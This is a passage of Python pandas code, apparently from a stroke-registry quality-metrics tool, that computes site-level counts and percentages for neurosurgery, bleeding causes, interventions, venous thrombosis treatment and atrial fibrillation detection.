self.tmp = self.df.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING_TIME']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING_TIME", value=1, new_column_name='# dysphagia screening time - Within first 24 hours')
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING_TIME", value=2, new_column_name='# dysphagia screening time - After first 24 hours')
self.statsDf['% dysphagia screening time - Within first 24 hours'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening time - Within first 24 hours']/(x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours'])) * 100), 2) if (x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours']) > 0 else 0, axis=1)
self.statsDf['% dysphagia screening time - After first 24 hours'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening time - After first 24 hours']/(x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours'])) * 100), 2) if (x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours']) > 0 else 0, axis=1)
###################
# HEMICRANIECTOMY #
###################
self.tmp = isch.groupby(['Protocol ID', 'HEMICRANIECTOMY']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=1, new_column_name='# hemicraniectomy - Yes')
self.statsDf['% hemicraniectomy - Yes'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - Yes']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=2, new_column_name='# hemicraniectomy - No')
self.statsDf['% hemicraniectomy - No'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - No']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=3, new_column_name='# hemicraniectomy - Referred to another centre')
self.statsDf['% hemicraniectomy - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - Referred to another centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
################
# NEUROSURGERY #
################
self.tmp = ich.groupby(['Protocol ID', 'NEUROSURGERY']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=3, new_column_name='# neurosurgery - Not known')
self.statsDf['% neurosurgery - Not known'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - Not known']/x['ich_patients']) * 100), 2) if x['ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=1, new_column_name='# neurosurgery - Yes')
self.statsDf['% neurosurgery - Yes'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - Yes']/(x['ich_patients'] - x['# neurosurgery - Not known'])) * 100), 2) if (x['ich_patients'] - x['# neurosurgery - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=2, new_column_name='# neurosurgery - No')
self.statsDf['% neurosurgery - No'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - No']/(x['ich_patients'] - x['# neurosurgery - Not known'])) * 100), 2) if (x['ich_patients'] - x['# neurosurgery - Not known']) > 0 else 0, axis=1)
#####################
# NEUROSURGERY TYPE #
#####################
# Create temporary dataframe of patients who have undergone neurosurgery
neurosurgery = ich[ich['NEUROSURGERY'].isin([1])].copy()
if neurosurgery.empty:
# If no data available set 0 to all variables
self.statsDf['neurosurgery_patients'] = 0
self.statsDf['# neurosurgery type - intracranial hematoma evacuation'] = 0
self.statsDf['% neurosurgery type - intracranial hematoma evacuation'] = 0
self.statsDf['# neurosurgery type - external ventricular drainage'] = 0
self.statsDf['% neurosurgery type - external ventricular drainage'] = 0
self.statsDf['# neurosurgery type - decompressive craniectomy'] = 0
self.statsDf['% neurosurgery type - decompressive craniectomy'] = 0
self.statsDf['# neurosurgery type - Referred to another centre'] = 0
self.statsDf['% neurosurgery type - Referred to another centre'] = 0
else:
self.tmp = neurosurgery.groupby(['Protocol ID', 'NEUROSURGERY_TYPE']).size().to_frame('count').reset_index()
self.statsDf['neurosurgery_patients'] = self._count_patients(dataframe=neurosurgery)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=1, new_column_name='# neurosurgery type - intracranial hematoma evacuation')
self.statsDf['% neurosurgery type - intracranial hematoma evacuation'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - intracranial hematoma evacuation']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=2, new_column_name='# neurosurgery type - external ventricular drainage')
self.statsDf['% neurosurgery type - external ventricular drainage'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - external ventricular drainage']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=3, new_column_name='# neurosurgery type - decompressive craniectomy')
self.statsDf['% neurosurgery type - decompressive craniectomy'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - decompressive craniectomy']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=4, new_column_name='# neurosurgery type - Referred to another centre')
self.statsDf['% neurosurgery type - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - Referred to another centre']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
del neurosurgery
###################
# BLEEDING REASON #
###################
self.tmp = ich.groupby(['Protocol ID', 'BLEEDING_REASON']).size().to_frame('count').reset_index()
self.tmp['BLEEDING_REASON'] = self.tmp['BLEEDING_REASON'].astype(str)
# Get number of patients entered in older form
self.statsDf = self._get_values_for_factors(column_name="BLEEDING_REASON", value='-999', new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value='1', new_column_name='# bleeding reason - arterial hypertension')
self.statsDf['% bleeding reason - arterial hypertension'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - arterial hypertension']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="2", new_column_name='# bleeding reason - aneurysm')
self.statsDf['% bleeding reason - aneurysm'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - aneurysm']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="3", new_column_name='# bleeding reason - arterio-venous malformation')
self.statsDf['% bleeding reason - arterio-venous malformation'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - arterio-venous malformation']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="4", new_column_name='# bleeding reason - anticoagulation therapy')
self.statsDf['% bleeding reason - anticoagulation therapy'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - anticoagulation therapy']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="5", new_column_name='# bleeding reason - amyloid angiopathy')
self.statsDf['% bleeding reason - amyloid angiopathy'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - amyloid angiopathy']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="6", new_column_name='# bleeding reason - Other')
self.statsDf['% bleeding reason - Other'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - Other']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
### DATA NORMALIZATION
norm_tmp = self.statsDf[['% bleeding reason - arterial hypertension', '% bleeding reason - aneurysm', '% bleeding reason - arterio-venous malformation', '% bleeding reason - anticoagulation therapy', '% bleeding reason - amyloid angiopathy', '% bleeding reason - Other']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['bleeding_arterial_hypertension_perc_norm'] = ((norm_tmp['% bleeding reason - arterial hypertension']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_aneurysm_perc_norm'] = ((norm_tmp['% bleeding reason - aneurysm']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_arterio_venous_malformation_perc_norm'] = ((norm_tmp['% bleeding reason - arterio-venous malformation']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_anticoagulation_therapy_perc_norm'] = ((norm_tmp['% bleeding reason - anticoagulation therapy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_amyloid_angiopathy_perc_norm'] = ((norm_tmp['% bleeding reason - amyloid angiopathy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_other_perc_norm'] = ((norm_tmp['% bleeding reason - Other']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
# MORE THAN ONE POSIBILITY
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value=",", new_column_name='# bleeding reason - more than one')
self.statsDf['% bleeding reason - more than one'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - more than one']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# BLEEDING SOURCE #
###################
self.tmp = sah.groupby(['Protocol ID', 'BLEEDING_SOURCE']).size().to_frame('count').reset_index()
self.tmp['BLEEDING_SOURCE'] = self.tmp['BLEEDING_SOURCE'].astype(str)
# Get number of patients entered in older form
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='-999', new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='-999', new_column_name='tmp')
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='1', new_column_name='# bleeding source - Known')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='1', new_column_name='# bleeding source - Known')
self.statsDf['% bleeding source - Known'] = self.statsDf.apply(lambda x: round(((x['# bleeding source - Known']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='2', new_column_name='# bleeding source - Not known')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='2', new_column_name='# bleeding source - Not known')
self.statsDf['% bleeding source - Not known'] = self.statsDf.apply(lambda x: round(((x['# bleeding source - Not known']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
################
# INTERVENTION #
################
self.tmp = sah.groupby(['Protocol ID', 'INTERVENTION']).size().to_frame('count').reset_index()
self.tmp['INTERVENTION'] = self.tmp['INTERVENTION'].astype(str)
# Get number of patients entered in older form
self.statsDf = self._get_values_for_factors(column_name="INTERVENTION", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="1", new_column_name='# intervention - endovascular (coiling)')
self.statsDf['% intervention - endovascular (coiling)'] = self.statsDf.apply(lambda x: round(((x['# intervention - endovascular (coiling)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="2", new_column_name='# intervention - neurosurgical (clipping)')
self.statsDf['% intervention - neurosurgical (clipping)'] = self.statsDf.apply(lambda x: round(((x['# intervention - neurosurgical (clipping)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="3", new_column_name='# intervention - Other neurosurgical treatment (decompression, drainage)')
self.statsDf['% intervention - Other neurosurgical treatment (decompression, drainage)'] = self.statsDf.apply(lambda x: round(((x['# intervention - Other neurosurgical treatment (decompression, drainage)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="4", new_column_name='# intervention - Referred to another hospital for intervention')
self.statsDf['% intervention - Referred to another hospital for intervention'] = self.statsDf.apply(lambda x: round(((x['# intervention - Referred to another hospital for intervention']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="5|6", new_column_name='# intervention - None / no intervention')
self.statsDf['% intervention - None / no intervention'] = self.statsDf.apply(lambda x: round(((x['# intervention - None / no intervention']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
### DATA NORMALIZATION
norm_tmp = self.statsDf[['% intervention - endovascular (coiling)', '% intervention - neurosurgical (clipping)', '% intervention - Other neurosurgical treatment (decompression, drainage)', '% intervention - Referred to another hospital for intervention', '% intervention - None / no intervention']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['intervention_endovascular_perc_norm'] = ((norm_tmp['% intervention - endovascular (coiling)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_neurosurgical_perc_norm'] = ((norm_tmp['% intervention - neurosurgical (clipping)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_other_perc_norm'] = ((norm_tmp['% intervention - Other neurosurgical treatment (decompression, drainage)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_referred_perc_norm'] = ((norm_tmp['% intervention - Referred to another hospital for intervention']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_none_perc_norm'] = ((norm_tmp['% intervention - None / no intervention']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value=",", new_column_name='# intervention - more than one')
self.statsDf['% intervention - more than one'] = self.statsDf.apply(lambda x: round(((x['# intervention - more than one']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
################
# VT TREATMENT #
################
if ('VT_TREATMENT' not in cvt.columns):
cvt['VT_TREATMENT'] = np.nan
self.tmp = cvt.groupby(['Protocol ID', 'VT_TREATMENT']).size().to_frame('count').reset_index()
self.tmp[['VT_TREATMENT']] = self.tmp[['VT_TREATMENT']].astype(str)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="1", new_column_name='# VT treatment - anticoagulation')
self.statsDf['% VT treatment - anticoagulation'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - anticoagulation']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="2", new_column_name='# VT treatment - thrombectomy')
self.statsDf['% VT treatment - thrombectomy'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - thrombectomy']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="3", new_column_name='# VT treatment - local thrombolysis')
self.statsDf['% VT treatment - local thrombolysis'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - local thrombolysis']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="4", new_column_name='# VT treatment - local neurological treatment')
self.statsDf['% VT treatment - local neurological treatment'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - local neurological treatment']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value=",", new_column_name='# VT treatment - more than one treatment')
self.statsDf['% VT treatment - more than one treatment'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - more than one treatment']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
### DATA NORMALIZATION
norm_tmp = self.statsDf[['% VT treatment - anticoagulation', '% VT treatment - thrombectomy', '% VT treatment - local thrombolysis', '% VT treatment - local neurological treatment']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['vt_treatment_anticoagulation_perc_norm'] = ((norm_tmp['% VT treatment - anticoagulation']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_thrombectomy_perc_norm'] = ((norm_tmp['% VT treatment - thrombectomy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_local_thrombolysis_perc_norm'] = ((norm_tmp['% VT treatment - local thrombolysis']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_local_neurological_treatment_perc_norm'] = ((norm_tmp['% VT treatment - local neurological treatment']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
########
# AFIB #
########
# tag::afib[]
if country_code == 'CZ':
not_reffered = is_tia.loc[~(is_tia['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & is_tia['RECANALIZATION_PROCEDURES'].isin([5,6,8]))].copy()
self.statsDf['not_reffered_patients'] = self._count_patients(dataframe=not_reffered)
# Create dataframe with the patients referred to another hospital
reffered = is_tia[is_tia['RECANALIZATION_PROCEDURES'].isin([5,6,8])].copy()
self.statsDf['reffered_patients'] = self._count_patients(dataframe=reffered)
self.tmp = not_reffered.groupby(['Protocol ID', 'AFIB_FLUTTER']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=1, new_column_name='# afib/flutter - Known')
self.statsDf['% afib/flutter - Known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=2, new_column_name='# afib/flutter - Newly-detected at admission')
self.statsDf['% afib/flutter - Newly-detected at admission'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Newly-detected at admission']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=3, new_column_name='# afib/flutter - Detected during hospitalization')
self.statsDf['% afib/flutter - Detected during hospitalization'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Detected during hospitalization']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=4, new_column_name='# afib/flutter - Not detected')
self.statsDf['% afib/flutter - Not detected'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not detected']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=5, new_column_name='# afib/flutter - Not known')
self.statsDf['% afib/flutter - Not known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf['afib_flutter_detected_only'] = self.statsDf['# afib/flutter - Newly-detected at admission'] + self.statsDf['# afib/flutter - Detected during hospitalization']
self.statsDf['% patients detected for aFib'] = self.statsDf.apply(lambda x: round(((x['afib_flutter_detected_only']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
else:
not_reffered = is_tia[~is_tia['RECANALIZATION_PROCEDURES'].isin([7])].copy()
self.statsDf['not_reffered_patients'] = self._count_patients(dataframe=not_reffered)
# Create dataframe with the patients referred to another hospital
reffered = is_tia[is_tia['RECANALIZATION_PROCEDURES'].isin([7])].copy()
self.statsDf['reffered_patients'] = self._count_patients(dataframe=reffered)
self.tmp = not_reffered.groupby(['Protocol ID', 'AFIB_FLUTTER']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=1, new_column_name='# afib/flutter - Known')
self.statsDf['% afib/flutter - Known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=2, new_column_name='# afib/flutter - Newly-detected at admission')
self.statsDf['% afib/flutter - Newly-detected at admission'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Newly-detected at admission']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=3, new_column_name='# afib/flutter - Detected during hospitalization')
self.statsDf['% afib/flutter - Detected during hospitalization'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Detected during hospitalization']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=4, new_column_name='# afib/flutter - Not detected')
self.statsDf['% afib/flutter - Not detected'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not detected']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=5, new_column_name='# afib/flutter - Not known')
self.statsDf['% afib/flutter - Not known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
self.statsDf['afib_flutter_detected_only'] = self.statsDf['# afib/flutter - Newly-detected at admission'] + self.statsDf['# afib/flutter - Detected during hospitalization']
self.statsDf['% patients detected for aFib'] = self.statsDf.apply(lambda x: round(((x['afib_flutter_detected_only']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
# end::afib[]
#########################
# AFIB DETECTION METHOD #
#########################
if country_code == 'CZ':
afib_detected_during_hospitalization = not_reffered[not_reffered['AFIB_FLUTTER'].isin([3])].copy()
self.statsDf['afib_detected_during_hospitalization_patients'] = self._count_patients(dataframe=afib_detected_during_hospitalization)
afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'] = afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'].astype(str) # Convert values to string
self.tmp = afib_detected_during_hospitalization.groupby(['Protocol ID', 'AFIB_DETECTION_METHOD']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value="1", new_column_name='# afib detection method - Telemetry with monitor allowing automatic detection of aFib')
self.statsDf['% afib detection method - Telemetry with monitor allowing automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Telemetry with monitor allowing automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value="2", new_column_name='# afib detection method - Telemetry without monitor allowing automatic detection of aFib')
self.statsDf['% afib detection method - Telemetry without monitor allowing automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Telemetry without monitor allowing automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value="3", new_column_name='# afib detection method - Holter-type monitoring')
self.statsDf['% afib detection method - Holter-type monitoring'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Holter-type monitoring']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value="4", new_column_name='# afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib')
self.statsDf['% afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value="5", new_column_name='# afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib')
self.statsDf['% afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
else:
afib_detected_during_hospitalization = not_reffered[not_reffered['AFIB_FLUTTER'].isin([3])].copy()
self.statsDf['afib_detected_during_hospitalization_patients'] = self._count_patients(dataframe=afib_detected_during_hospitalization)
afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'] = afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'].astype(str)
self.tmp = afib_detected_during_hospitalization.groupby(['Protocol ID', 'AFIB_DETECTION_METHOD']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=1, new_column_name='# afib detection method - Telemetry with monitor allowing automatic detection of aFib')
self.statsDf['% afib detection method - Telemetry with monitor allowing automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Telemetry with monitor allowing automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=2, new_column_name='# afib detection method - Telemetry without monitor allowing automatic detection of aFib')
self.statsDf['% afib detection method - Telemetry without monitor allowing automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Telemetry without monitor allowing automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=3, new_column_name='# afib detection method - Holter-type monitoring')
self.statsDf['% afib detection method - Holter-type monitoring'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - Holter-type monitoring']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=4, new_column_name='# afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib')
self.statsDf['% afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - EKG monitoring in an ICU bed with automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=5, new_column_name='# afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib')
self.statsDf['% afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib'] = self.statsDf.apply(lambda x: round(((x['# afib detection method - EKG monitoring in an ICU bed without automatic detection of aFib']/x['afib_detected_during_hospitalization_patients']) * 100), 2) if x['afib_detected_during_hospitalization_patients'] > 0 else 0, axis=1)
###############################
# AFIB OTHER DETECTION METHOD #
###############################
afib_not_detected_or_not_known = not_reffered[not_reffered['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_not_detected_or_not_known_patients'] = self._count_patients(dataframe=afib_not_detected_or_not_known)
self.tmp = afib_not_detected_or_not_known.groupby(['Protocol ID', 'AFIB_OTHER_RECS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="AFIB_OTHER_RECS", value=1, new_column_name='# other afib detection method - Yes')
self.statsDf['% other afib detection method - Yes'] = self.statsDf.apply(lambda x: round(((x['# other afib detection method - Yes']/x['afib_not_detected_or_not_known_patients']) * 100), 2) if x['afib_not_detected_or_not_known_patients'] > 0 else 0, axis=1)
